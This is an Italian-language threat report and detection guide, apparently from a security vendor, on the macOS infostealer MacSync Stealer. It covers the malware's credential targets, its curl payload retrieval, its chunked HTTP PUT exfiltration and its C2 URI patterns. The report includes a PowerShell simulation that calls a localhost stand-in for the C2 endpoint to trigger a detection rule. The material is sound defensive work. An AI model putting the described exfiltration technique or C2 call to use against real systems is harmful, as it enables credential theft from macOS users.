Monitoraggio dell’Infrastruttura di MacSync Stealer con Analisi Comportamentale
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
MacSync Stealer è un ladro di informazioni focalizzato su macOS che si basa su un’infrastruttura di comando e controllo in rapida rotazione. Il malware prende di mira dati preziosi, inclusi i contenuti del Portachiavi macOS, le credenziali dei browser, le chiavi SSH e le credenziali cloud. La sua catena di attacco guidata da script combina ingegneria sociale, recupero dei payload attraverso curl, e esfiltrazione di dati suddivisi in blocchi utilizzando richieste HTTP PUT.
Indagine
Microsoft Defender Experts ha identificato la minaccia correlando comportamenti ricorrenti su endpoint e rete invece di affidarsi a indicatori di dominio statici. L’indagine ha collegato più di 30 domini concentrandosi su pivot comportamentali durevoli come percorsi URI specifici, stringhe User-Agent di macOS e parametri di upload distintivi. Questo approccio ha permesso ai ricercatori di tracciare l’attività dal recupero iniziale del payload fino alla memorizzazione dei dati e all’esfiltrazione finale.
Mitigazione
Le organizzazioni dovrebbero ridurre il rischio di esecuzioni del Terminale iniziate dagli utenti attraverso la consapevolezza della sicurezza e i controlli di piattaforma che limitano i flussi di lavoro sospetti di copia e incolla. Proteggere gli archivi di credenziali come il Portachiavi macOS e i profili dei browser da accessi non autorizzati è fondamentale. Monitorare combinazioni sospette di utility macOS e caricamenti HTTP PUT insoliti può anche aiutare a rilevare un’esfiltrazione attiva dei dati.
Risposta
Se viene rilevata un’attività di MacSync Stealer, i responsabili dovrebbero correlare esecuzioni sospette di shell e AppleScript con la telemetria di rete in uscita. Gli investigatori dovrebbero esaminare la creazione di archivi in posizioni temporanee come /tmp/ e identificare accessi non autorizzati a file sensibili. Anche l’attività di rete dovrebbe essere esaminata per curl richieste contenenti identificatori di upload come upload_id, chunk_index, e total_chunks.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Tentativo Sospetto di Esecuzione di Curl [MacOS] (via cmdline)
Archivio Creato nella Cartella Temporanea di MacOS (via file_event)
Rilevamento di Schemi di C2 di MacSync Stealer e Esfiltrazione Dati [Webserver]
Rileva Recupero del Payload Iniziale di MacSync Stealer ed Esecuzione AppleScript [Linux Process Creation]
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-flight di Telemetria & Baseline deve essere passato.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrazione dell’Attacco & Comandi: Un avversario ha distribuito con successo il MacSync Stealer su un server web target. Dopo aver raccolto credenziali e informazioni sensibili del sistema, l’attaccante ora cerca di esfiltrare questi dati al proprio server di comando e controllo (C2). Per mimetizzarsi con il traffico amministrativo standard ed evitare il rilevamento da parte di strumenti basati su firme semplici, l’attaccante utilizza
curl.exeper inviare i dati rubati. Appende i parametri URI dannosi specifici/dynamic?txd=alla richiesta, che è la firma nota dell’infrastruttura di C2 di MacSync. -
Script di Test di Regressione:
# Script di simulazione per attivare la regola di rilevamento C2 di MacSync Stealer # Questo comando utilizza curl per raggiungere un endpoint C2 simulato con il pattern URI dannoso. $target_url = "http://127.0.0.1/dynamic?txd=malicious_payload_data" Write-Host "Simulando la comunicazione di C2 di MacSync Stealer..." curl.exe $target_url -
Comandi di Pulizia:
# Nessun file persistente viene creato da questa simulazione; # tuttavia, cancella la cronologia locale se necessario. Clear-History